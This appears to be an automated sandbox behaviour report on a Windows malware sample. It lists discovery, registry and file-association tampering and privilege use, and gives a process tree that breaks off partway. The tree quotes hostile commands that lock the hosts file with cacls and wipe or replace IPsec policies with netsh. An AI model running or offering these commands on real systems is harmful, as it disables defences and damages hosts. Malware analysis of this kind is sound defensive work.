\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
netsh.exenetsh.execmd.execmd.exeibsgrteit.execmd.execmd.exesc.exesc.exenetsh.exenetsh.exenet.exenet.exenet1.execmd.execacls.exenetsh.exenetsh.execmd.exenetsh.exenetsh.exenetsh.exenetsh.exenet1.exenetsh.exenet1.exenetsh.exenet1.execmd.exenetsh.exenetsh.execmd.execmd.exenetsh.exenetsh.exenetsh.execacls.exenetsh.exenet.exenetsh.execmd.execmd.exewpcap.exenet.exenet1.exeamydesk.exenetsh.exenetsh.exenetsh.exenet1.execmd.execacls.execmd.execacls.execacls.execmd.exenet.exe18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.execmd.exenetsh.execmd.execacls.exenetsh.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ibsgrteit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amydesk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 936 cmd.exe 748 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x000a000000023b95-6.dat nsis_installer_2 behavioral2/files/0x0014000000023bc5-24.dat nsis_installer_1 behavioral2/files/0x0014000000023bc5-24.dat nsis_installer_2 -
Modifies data under HKEY_USERS 49 IoCs
Processes:
ecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeetkqeec.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" etkqeec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" etkqeec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing etkqeec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ etkqeec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" etkqeec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" etkqeec.exe Key created \REGISTRY\USER\.DEFAULT\Software ecalbuvzn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ecalbuvzn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ecalbuvzn.exe -
Modifies registry class 14 IoCs
Processes:
etkqeec.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" etkqeec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" etkqeec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" etkqeec.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rapttuvwncdetbc31301.exeetkqeec.exepid Process 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 1824 rapttuvwncdetbc31301.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe 4044 etkqeec.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 656 656 656 656 656 656 656 656 656 656 656 656 656 656 656 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exepid Process 4688 18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
Processes:
18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exeetkqeec.exeetkqeec.exeecalbuvzn.exevfshost.exeecalbuvzn.exevaltve.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exeecalbuvzn.exedescription pid Process Token: SeDebugPrivilege 4688 18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe Token: SeDebugPrivilege 3588 etkqeec.exe Token: SeDebugPrivilege 4044 etkqeec.exe Token: SeDebugPrivilege 2860 ecalbuvzn.exe Token: SeDebugPrivilege 2620 vfshost.exe Token: SeDebugPrivilege 4092 ecalbuvzn.exe Token: SeLockMemoryPrivilege 2016 valtve.exe Token: SeLockMemoryPrivilege 2016 valtve.exe Token: SeDebugPrivilege 4620 ecalbuvzn.exe Token: SeDebugPrivilege 2560 ecalbuvzn.exe Token: SeDebugPrivilege 3316 ecalbuvzn.exe Token: SeDebugPrivilege 460 ecalbuvzn.exe Token: SeDebugPrivilege 5816 ecalbuvzn.exe Token: SeDebugPrivilege 5396 ecalbuvzn.exe Token: SeDebugPrivilege 3992 ecalbuvzn.exe Token: SeDebugPrivilege 6004 ecalbuvzn.exe Token: SeDebugPrivilege 6616 ecalbuvzn.exe Token: SeDebugPrivilege 6240 ecalbuvzn.exe Token: SeDebugPrivilege 4472 ecalbuvzn.exe Token: SeDebugPrivilege 5800 ecalbuvzn.exe Token: SeDebugPrivilege 2560 ecalbuvzn.exe Token: SeDebugPrivilege 7024 ecalbuvzn.exe Token: SeDebugPrivilege 1188 ecalbuvzn.exe Token: SeDebugPrivilege 6812 ecalbuvzn.exe Token: SeDebugPrivilege 2220 ecalbuvzn.exe Token: SeDebugPrivilege 5996 ecalbuvzn.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exeetkqeec.exeetkqeec.exerapttuvwncdetbc31301.exeetkqeec.exeamydesk.exeiaacws.exeetkqeec.exepid Process 4688 18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe 3588 etkqeec.exe 4044 etkqeec.exe 1824 rapttuvwncdetbc31301.exe 2744 etkqeec.exe 3240 amydesk.exe 4708 iaacws.exe 5524 etkqeec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.execmd.exeetkqeec.execmd.execmd.exedescription pid Process procid_target PID 4688 wrote to memory of 936 4688 18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe 84 PID 4688 wrote to memory of 936 4688 18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe 84 PID 4688 wrote to memory of 936 4688 18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe 84 PID 936 wrote to memory of 748 936 cmd.exe 86 PID 936 wrote to memory of 748 936 cmd.exe 86 PID 936 wrote to memory of 748 936 cmd.exe 86 PID 936 wrote to memory of 3588 936 cmd.exe 98 PID 936 wrote to memory of 3588 936 cmd.exe 98 PID 936 wrote to memory of 3588 936 cmd.exe 98 PID 4044 wrote to memory of 1824 4044 etkqeec.exe 100 PID 4044 wrote to memory of 1824 4044 etkqeec.exe 100 PID 4044 wrote to memory of 1824 4044 etkqeec.exe 100 PID 4044 wrote to memory of 816 4044 etkqeec.exe 101 PID 4044 wrote to memory of 816 4044 etkqeec.exe 101 PID 4044 wrote to memory of 816 4044 etkqeec.exe 101 PID 816 wrote to memory of 4024 816 cmd.exe 103 PID 816 wrote to memory of 4024 816 cmd.exe 103 PID 816 wrote to memory of 4024 816 cmd.exe 103 PID 816 wrote to memory of 1244 816 cmd.exe 104 PID 816 wrote to memory of 1244 816 cmd.exe 104 PID 816 wrote to memory of 1244 816 cmd.exe 104 PID 816 wrote to memory of 4748 816 cmd.exe 105 PID 816 wrote to memory of 4748 816 cmd.exe 105 PID 816 wrote to memory of 4748 816 cmd.exe 105 PID 816 wrote to memory of 4660 816 cmd.exe 106 PID 816 wrote to memory of 4660 816 cmd.exe 106 PID 816 wrote to memory of 4660 816 cmd.exe 106 PID 816 wrote to memory of 4812 816 cmd.exe 107 PID 816 wrote to memory of 4812 816 cmd.exe 107 PID 816 wrote to memory of 4812 816 cmd.exe 107 PID 816 wrote to memory of 1944 816 cmd.exe 108 PID 816 wrote to memory of 1944 816 cmd.exe 108 PID 816 wrote to memory of 1944 816 cmd.exe 108 PID 4044 wrote to memory of 2312 4044 etkqeec.exe 110 PID 4044 wrote to memory of 2312 4044 etkqeec.exe 110 PID 4044 wrote to memory of 2312 4044 etkqeec.exe 110 PID 4044 wrote to memory of 4796 4044 etkqeec.exe 114 PID 4044 wrote to memory of 4796 4044 etkqeec.exe 114 PID 4044 wrote to memory of 4796 4044 etkqeec.exe 114 PID 4044 wrote to memory of 4356 4044 etkqeec.exe 116 PID 4044 wrote to memory of 4356 4044 etkqeec.exe 116 PID 4044 wrote to memory of 4356 4044 etkqeec.exe 116 PID 4044 wrote to memory of 3028 4044 etkqeec.exe 118 PID 4044 wrote to memory of 3028 4044 etkqeec.exe 118 PID 4044 wrote to memory of 3028 4044 etkqeec.exe 118 PID 3028 wrote to memory of 4620 3028 cmd.exe 120 PID 3028 wrote to memory of 4620 3028 cmd.exe 120 PID 3028 wrote to memory of 4620 3028 cmd.exe 120 PID 3028 wrote to memory of 4720 3028 cmd.exe 121 PID 3028 wrote to memory of 4720 3028 cmd.exe 121 PID 3028 wrote to memory of 4720 3028 cmd.exe 121 PID 4044 wrote to memory of 460 4044 etkqeec.exe 122 PID 4044 wrote to memory of 460 4044 etkqeec.exe 122 PID 4044 wrote to memory of 460 4044 etkqeec.exe 122 PID 4044 wrote to memory of 2008 4044 etkqeec.exe 124 PID 4044 wrote to memory of 2008 4044 etkqeec.exe 124 PID 4044 wrote to memory of 2008 4044 etkqeec.exe 124 PID 4044 wrote to memory of 4520 4044 etkqeec.exe 126 PID 4044 wrote to memory of 4520 4044 etkqeec.exe 126 PID 4044 wrote to memory of 4520 4044 etkqeec.exe 126 PID 4044 wrote to memory of 2532 4044 etkqeec.exe 128 PID 4044 wrote to memory of 2532 4044 etkqeec.exe 128 PID 4044 wrote to memory of 2532 4044 etkqeec.exe 128 PID 4044 wrote to memory of 2892 4044 etkqeec.exe 130
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2152
-
C:\Windows\TEMP\zlnubjlrd\valtve.exe"C:\Windows\TEMP\zlnubjlrd\valtve.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Users\Admin\AppData\Local\Temp\18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe"C:\Users\Admin\AppData\Local\Temp\18b9cf6a369a93d5e56df3c42bf51cc743024b547d55868e21b5bfbe79e548edN.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gcgzbiui\etkqeec.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:748
-
-
C:\Windows\gcgzbiui\etkqeec.exeC:\Windows\gcgzbiui\etkqeec.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3588
-
-
-
C:\Windows\gcgzbiui\etkqeec.exeC:\Windows\gcgzbiui\etkqeec.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Indicator Removal: Clear Persistence
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\gcgzbiui\rapttuvwncdetbc31301.exeC:\Windows\gcgzbiui\rapttuvwncdetbc31301.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1824
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4024
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4748
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:4660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4812
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:1944
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static delete all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2312
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
